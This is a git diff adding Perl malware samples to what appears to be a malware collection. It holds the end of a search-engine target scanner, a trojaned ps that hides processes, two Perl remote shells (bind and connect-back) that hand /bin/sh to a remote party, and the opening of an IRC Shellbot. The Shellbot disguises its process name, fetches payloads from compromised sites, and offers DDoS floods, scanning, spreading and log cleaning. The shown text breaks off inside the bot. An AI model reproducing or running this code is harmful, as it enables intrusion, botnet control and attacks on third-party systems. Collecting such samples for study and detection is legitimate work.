@grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS Yahoo +##### +sub yahoo(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=100){ +my $Ya=("http://br.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub yahooa(){ +my @lst; +my $key = $_[0]; +for($b=210;$b<=1000;$b+=210){ +my $Ya=("http://be.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub yahoob(){ +my @lst; +my $key = $_[0]; +for($b=410;$b<=1000;$b+=210){ +my $Ya=("http://us.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub yahooc(){ +my @lst; +my $key = $_[0]; +for($b=610;$b<=1000;$b+=210){ +my $Ya=("http://it.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub yahood(){ +my @lst; +my $key = $_[0]; +for($b=810;$b<=1000;$b+=210){ +my $Ya=("http://de.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +##### +# SUBS MSN +##### +sub msn(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE"); +my $Res=query($MsN); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if($1 !~ /msn|live/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS SEARCH +##### +sub search(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $ser=("http://www.search.com/search?q=".key($key)."".$b); +my $Res=query($ser); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS FireBall +##### +sub fireball(){ +my $key=$_[0]; +my $inizio=1; +my $pagine=200; +my @lst; +my $av=0; +while($inizio <= $pagine){ +my $fireball="http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=fb_loc&idx=all&enc=utf-8"; +my $Res=query($fireball); +while ($Res=~ m/<a href=\"?http:\/\/(.+?)\//g ){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k="$1/"; +my @grep=links($k); +push(@lst,@grep); +}} +$av=$av+10; +$inizio++; +} +return @lst; +} + +##### +# SUBS UOL +##### +sub uol(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i); +my $Res=query($UoL); +while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){ +my $k=$1; +if($k!~/busca|uol|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# Altavista +##### +sub altavista(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); +my $Res=query($AlT); +while($Res=~m/<span class=ngrn>(.+?)\//g){ +if($1 !~ /altavista/){ +my $k=$1; +$k=~s/<//g; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +sub altavistade(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $AlT=("http://de.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); +my $Res=query($AlT); +while($Res=~m/<span class=ngrn>(.+?)\//g){ +if($1 !~ /altavista/){ +my $k=$1; +$k=~s/<//g; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +sub altavistaus(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $AlT=("http://us.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); +my $Res=query($AlT); +while($Res=~m/<span class=ngrn>(.+?)\//g){ +if($1 !~ /altavista/){ +my $k=$1; +$k=~s/<//g; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# HotBot +##### +sub hotbot(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $hot=("http://search.hotbot.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=hb_loc&enc=utf-8".$b); +my $Res=query($hot); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + + +##### +# Mamma +##### +sub mamma(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $mam=("http://www.mamma.com/Mamma?utfout=$av&qtype=0&query=".key($key)."".$b); +my $Res=query($mam); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# MozBot +##### +sub mozbot() +{ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=100; $i+=1){ +my $mozbot=("http://www.mozbot.fr/search?q=".key($key)."&st=int&page=".$i); +my $Res=query($mozbot); +while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub links() +{ +my @l; +my $link=$_[0]; +my $host=$_[0]; +my $hdir=$_[0]; +$hdir=~s/(.*)\/[^\/]*$/\1/; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$host.="/"; +$link.="/"; +$hdir.="/"; +$host=~s/\/\//\//g; +$hdir=~s/\/\//\//g; +$link=~s/\/\//\//g; +push(@l,$link,$host,$hdir); +return @l; +} + +sub geths(){ +my $host=$_[0]; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +return $host; +} + +sub key(){ +my $chiave=$_[0]; +$chiave =~ s/ /\+/g; +$chiave =~ s/:/\%3A/g; +$chiave =~ s/\//\%2F/g; +$chiave =~ s/&/\%26/g; +$chiave =~ s/\"/\%22/g; +$chiave =~ s/,/\%2C/g; +$chiave =~ s/\\/\%5C/g; +return $chiave; +} + +sub query($){ +my $url=$_[0]; +$url=~s/http:\/\///; +my $host=$url; +my $query=$url; +my $page=""; +$host=~s/href=\"?http:\/\///; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query=~s/$host//; +if ($query eq "") {$query="/";}; +eval { +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +close($sock); +}; +return $page; +} + +sub unici{ +my @unici = (); +my %visti = (); +foreach my $elemento ( @_ ) +{ +next if $visti{ $elemento }++; +push @unici, $elemento; +} +return @unici; +} + +sub http_query($){ +my ($url) = @_; +my $host=$url; +my $query=$url; +my $page=""; +$host =~ s/href=\"?http:\/\///; +$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query =~s/$host//; +if ($query eq "") {$query="/";}; +eval { +local $SIG{ALRM} = sub { die "1";}; +alarm 10; +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +alarm 0; +close($sock); +}; +return $page; +} +} + + +############################################### +# # +# cHApoenk XtReme scanNER # +# # +############################################### + + + diff --git a/Perl/Backdoor.Perl.Psesb b/Perl/Backdoor.Perl.Psesb new file mode 100644 index 00000000..15a092e0 --- /dev/null +++ b/Perl/Backdoor.Perl.Psesb @@ -0,0 +1,40 @@ +# +# lame tiny easy to use backdoor for ps +# +# the word placed after filterword= will be filtered out of the output of ps +# +# usage: +# # mv /bin/ps /bin/.ps +# # cp ~/psbackdoor.sh /bin/ps +# # chmod a+x /bin/ps +# +# Thats it, have phun scriptkiddies +# The Itch / Bse / g0tr00t +# http://bse.die.ms +# http://www.g0tr00t.net + +filterword="su" + +originalps=/bin/.ps +tempfile=/tmp/.pstmp +grep=/bin/grep +numlines=0 + +touch $tempfile + +if [ ! -x $originalps ]; then + echo "Error: original ps not found!"; + exit 1 +fi + +if [ ! -w $tempfile ]; then + echo "Error: tempfile handling failed!"; + exit 1 +fi + +$originalps $1 $2 $3 $4| $grep -v $filterword > $tempfile +numlines=`cat $tempfile|wc -l` +numlines=`expr $numlines - 2` +head -n $numlines $tempfile +rm -rf $tempfile + diff --git a/Perl/Backdoor.Perl.RShell.a b/Perl/Backdoor.Perl.RShell.a new file mode 100644 index 00000000..93c86ae9 --- /dev/null +++ b/Perl/Backdoor.Perl.RShell.a @@ -0,0 +1,130 @@ + +# + +# Asmodeus v0.1 + +# Perl Remote Shell + +# by phuket + +# www.smoking-gnu.org + +# + +# (Server is based on some code found on [url=http://www.governmentsecurity.org)]www.governmentsecurity.org)[/url] + +# + + + +# perl asmodeus.pl client 6666 127.0.0.1 + +# perl asmodeus.pl server 6666 + +# + + + + + +use Socket; + + + +$cs=$ARGV[0]; + +$port=$ARGV[1]; + +$host=$ARGV[2]; + + + +if ($cs eq 'client') {&client} + +elsif ($cs eq 'server') {&server} + + + + + + + + + +sub client{ + +socket(TO_SERVER, PF_INET, SOCK_STREAM, getprotobyname('tcp')); + +$internet_addr = inet_aton("$host") or die "ALOA:$!\n"; + +$paddr=sockaddr_in("$port", $internet_addr); + +connect(TO_SERVER, $paddr) or die "$port:$internet_addr:$!\n"; + +open(STDIN, ">&TO_SERVER"); + +open(STDOUT, ">&TO_SERVER"); + +open(STDERR, ">&TO_SERVER"); + +print "Asmodeus Perl Remote Shell\n"; + +system(date); + +system("/bin/sh"); + +close(TO_SERVER); + +} + + + + + + + + + + + +sub server{ + +$proto=getprotobyname('tcp'); + +$0="asm"; + +$system='/bin/sh'; + +socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!"; + +setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!"; + +bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!"; + +listen(SERVER, SOMAXCONN) or die "listen: $!"; + +for(;$paddr=accept(CLIENT, SERVER);close CLIENT) { + + open(STDIN, ">&CLIENT"); + + open(STDOUT, ">&CLIENT"); + + open(STDERR, ">&CLIENT"); + + print "Asmodeus Perl Remote Shell\n"; + + system(date); + + system("/bin/sh"); + + close(STDIN); + + close(STDOUT); + + close(STDERR); + + return; + +} + +} \ No newline at end of file diff --git a/Perl/Backdoor.Perl.RShell.b b/Perl/Backdoor.Perl.RShell.b new file mode 100644 index 00000000..ac569465 --- /dev/null +++ b/Perl/Backdoor.Perl.RShell.b @@ -0,0 +1,60 @@ +use IO::Socket; +#WwW.CoM Security Hackers +#coded bY: MasterKid +#We Are: MasterKid, AleXutz, FatMan & MiKuTuL +#Email: muzicteam2006@yahoo.com +# +#kid@SlackwareLinux:/home/programing$ perl dc.pl +#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- +# +#Usage: dc.pl [Host] [Port] +# +#Ex: dc.pl 127.0.0.1 2121 +#kid@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 +#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- +# +#[*] Resolving HostName +#[*] Connecting... 127.0.0.1 +#[*] Spawning Shell +#[*] Connected to remote host + +#bash-2.05b# nc -vv -l -p 2121 +#listening on [any] 2121 ... +#connect to [127.0.0.1] from localhost [127.0.0.1] 32769 +#--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- +# +#--==Systeminfo==-- +#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux +# +#--==Userinfo==-- +#uid=1001(lord) gid=100(users) groups=100(users) +# +#--==Directory==-- +#/root +# +#--==Shell==-- +# +$system = '/bin/sh'; +$ARGC=@ARGV; +print "--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- \n\n"; +if ($ARGC!=2) { + print "Usage: $0 [Host] [Port] \n\n"; + die "Ex: $0 127.0.0.1 2121 \n"; +} +use Socket; +use FileHandle; +socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; +connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; +print "[*] Resolving HostName\n"; +print "[*] Connecting... $ARGV[0] \n"; +print "[*] Spawning Shell \n"; +print "[*] Connected to remote host \n"; +SOCKET->autoflush(); +open(STDIN, ">&SOCKET"); +open(STDOUT,">&SOCKET"); +open(STDERR,">&SOCKET"); +print "--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- \n\n"; +system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo; +echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); +system($system); +#EOF \ No newline at end of file diff --git a/Perl/Backdoor.Perl.Shellbot.B.txt b/Perl/Backdoor.Perl.Shellbot.B.txt new file mode 100644 index 00000000..9aa85a73 --- /dev/null +++ b/Perl/Backdoor.Perl.Shellbot.B.txt @@ -0,0 +1,2578 @@ +#!/usr/bin/perl +# +######################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan Kata +# Anak +# _____ +# ( ___ ) _____ __ ___ ____ _ _ +# | | \ \( _ )( \/ )( _ )( ) ( ) +# _\\\\|_|_ _|_)_(_)_||_\__/|_||_|)_||_|_|_|_\ AnakDompu +# ////| | | ) | | || |\/ | || ___)| | | | / crew +# | |__/ /| (_) || | | || | | |_| | +# (_____) (_____)(_) (_)(_) (_____) +# +# AnakDompu [on] Dalnet й 2008 +# +# +######################################################## + + +use IO::Socket::INET; +use HTTP::Request; +use LWP::UserAgent; +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By Shinchi # +# #AnakDompu # +# irc.dal.net # +################################################## +my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]"); +my $processo = $ps[rand scalar @ps]; +my $linas_max='10'; +my $sleep='3'; +my $cmd="http://www.voetbalkeurmerk.nl/images/adu.png??"; +my $id="http://www.gasthof-neumeister.com/images/zoom/special.txt???"; +my $spread="http://www.gasthof-neumeister.com/images/zoom/alls.txt???"; +my $perawan="http://www.gasthof-neumeister.com/images/zoom/alls.txt???"; +my $idku="http://www.gasthof-neumeister.com/images/zoom/pbots.txt???"; +my @adms=("Shinchi","FuRkaN"); +my @canais=("#╖"); +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By Shinchi # +# #AnakDompu # +# irc.dal.net # +################################################## +my @nickname = ("AkeZuKa", + "AbankSayang", + "Sampula", + "FuRkaN", + "AnakDompu", + "SaMaDa", + "SaMPeLa", + "ShuZuKa", + "TalamPa", + "Tambora", + "Henca", + "Hencarasa", + "HencaSpy", + "SamPuLa"); +my @rname = ("Ketika Rasa Tak Dapat Di UngkaP", + "PowereD By AnakDompu", + "SeRinG PuTus Cinta", + "Aku Mudah Jatuh Cinta", + "ModeL Bug1L AnakDompu", + "Jpop And JrocK Lyric", + "Ketika Rasa Tak Dapat Diungkap Bro", + "Percuma Kita Bersama DinDa", + "Shinchi Memang cakep", + "Suka Nonton Movie hentai la", + "Lihat Cewek2 Pake tanktop", + "Owned By AnakDompu"); +my $nick = $nickname[rand scalar @nickname]; +my $ircname = $nickname[rand scalar @nickname]; +my $realname = $rname[rand scalar @rname]; +$servidor='irc.indoirc.net' unless $servidor; +my $porta='6667'; + +$SIG{'INT'} = 'IGNORE'; +$SIG{'HUP'} = 'IGNORE'; +$SIG{'TERM'} = 'IGNORE'; +$SIG{'CHLD'} = 'IGNORE'; +$SIG{'PS'} = 'IGNORE'; +use IO::Socket; +use Socket; +use IO::Select; +chdir("/"); +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By Shinchi # +# #AnakDompu # +# irc.dal.net # +################################################## + +#Connect +$servidor="$ARGV[0]" if $ARGV[0]; +$0="$processo"."\0"x16;; +my $pid=fork; +exit if $pid; +die "Masalah fork: $!" unless defined($pid); + +our %irc_servers; +our %DCC; +my $dcc_sel = new IO::Select->new(); +$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my $socket = $_[0]; + print $socket "$_[1]\n"; + } else { + print $IRC_cur_socket "$_[0]\n"; + } +} + +sub conectar { + my $meunick = $_[0]; + my $servidor_con = $_[1]; + my $porta_con = $_[2]; + my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", + PeerPort=>$porta_con) or return(1); + if (defined($IRC_socket)) { + $IRC_cur_socket = $IRC_socket; + $IRC_socket->autoflush(1); + $sel_cliente->add($IRC_socket); + $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; + $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; + nick("$meunick"); + sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); + sleep 1; + } +} + +my $line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } + delete($irc_servers{''}) if (defined($irc_servers{''})); + my @ready = $sel_cliente->can_read(0); + next unless(@ready); + foreach $fh (@ready) { + $IRC_cur_socket = $fh; + $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; + $nread = sysread($fh, $msg, 4096); + if ($nread == 0) { + $sel_cliente->remove($fh); + $fh->close; + delete($irc_servers{$fh}); + } + @lines = split (/\n/, $msg); + for(my $c=0; $c<= $#lines; $c++) { + + $line = $lines[$c]; + $line=$line_temp.$line if ($line_temp); + $line_temp=''; + $line =~ s/\r$//; + unless ($c == $#lines) { + parse("$line"); + } else { + if ($#lines == 0) { + parse("$line"); + } elsif ($lines[$c] =~ /\r$/) { + parse("$line"); + } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse("$line"); + } else { + $line_temp = $line; + } + } + } + } +} + +sub parse { + my $servarg = shift; + if ($servarg =~ /^PING \:(.*)/) { + sendraw("PONG :$1"); + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; + if ($args =~ /^\001VERSION\001$/) { + notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001"); + } + if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) { + if ($onde eq "$meunick"){ + shell("$pn", "$args"); + } + +#End of Connect + +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By Shinchi # +# #AnakDompu # +# irc.dal.net # +################################################## +# PREFIX # +###################### + + if ($args =~ /^(\Q$meunick\E|\!bro)\s+(.*)/ ) { + my $natrix = $1; + my $arg = $2; + if ($arg =~ /^\!(.*)/) { + ircase("$pn","$onde","$1") unless ($natrix eq "!bro" and $arg =~ /^\!nick/); + } elsif ($arg =~ /^\@(.*)/) { + $ondep = $onde; + $ondep = $pn if $onde eq $meunick; + bfunc("$ondep","$1"); + } else { + shell("$onde", "$arg"); + } + } +} +} +###################### +# End of PREFIX # +###################### + +elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { +if (lc($1) eq lc($meunick)) { + $meunick=$4; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; +} +} elsif ($servarg =~ m/^\:(.+?)\s+433/i) { +nick("$meunick".int rand(999999)); +} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { +$meunick = $2; +$irc_servers{$IRC_cur_socket}{'nick'} = $meunick; +$irc_servers{$IRC_cur_socket}{'nome'} = "$1"; +foreach my $canal (@canais) { + sendraw("JOIN $canal ddosit"); +} +} +} + +sub bfunc { +my $printl = $_[0]; +my $funcarg = $_[1]; +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { + exit; +} else { + +###################### +# Help # +###################### + +if ($funcarg =~ /^help/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 Select the function you want help for"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4ddos"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4scan"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4backconnect"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4shell"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4portscanner"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 Or if you want too know all the commands type:"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4commands"); + +} + +if ($funcarg =~ /^ddos/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 There are 3 DDossers in this bot"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 UDPFlood, HTTPFlood and TCPFlood"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4udpflood <ip> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4tcpflood <ip> <port> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4httpflood <site> <time>"); + +} + +if ($funcarg =~ /^scanscan/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 This bot also contains a scan Scanner."); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 Commands :"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4scan <vuln> <dork>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 You can find strings here : http://www.xshqiptaretx.org/strings.txt "); + +} + +if ($funcarg =~ /^backconnect/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 You use backconnect like this :"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4back <ip><port>"); +} + +if ($funcarg =~ /^shell/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 This bot has a integrated shell"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 You can use it in private but also public in the channel"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 In public channel just use : 7!bro cd tmp12 for example"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 For help with the linux commands type :!bro 13@4linuxhelp"); +} + +if ($funcarg =~ /^portscanner/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 There is a normal portscan and a Nmap:"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4portscan <ip>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4nmap <ip> <beginport> <endport>"); +} + +if ($funcarg =~ /^commands/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 You can use the following commands :"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4portscan <ip>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4nmap <ip> <beginport> <endport>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4back <ip><port>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro cd tmp 12 for example"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4udpflood <ip> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4tcpflood <ip> <port> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4httpflood <site> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4linuxhelp"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4spread <scan>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4scan <vuln> <dork>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4system"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4logcleaner"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4sendmail <subject> <sender> <recipient> <message>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4milw0rm"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4join #channel"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4part #channel"); +} + +if ($funcarg =~ /^linuxhelp/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Dir where you are : pwd"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Start a Perl file : perl file.pl"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Go back from dir : cd .."); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Force to Remove a file/dir : rm -rf file/dir;ls -la"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Show all files/dir with permissions : ls -lia"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Find config.inc.php files : find / -type f -name config.inc.php"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Find all writable folders and files : find / -perm -2 -ls"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Find all .htpasswd files : find / -type f -name .htpasswd"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Find all service.pwd files : find / -type f -name service.pwd"); +} + +###################### +# End of Help # +###################### +if ($funcarg =~ /^spread\s+(.*)/) { +$vuln = $1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Spread Mode] 13,6[1Shinchi]11,10[1Memang]13,6[1Cakep] :4 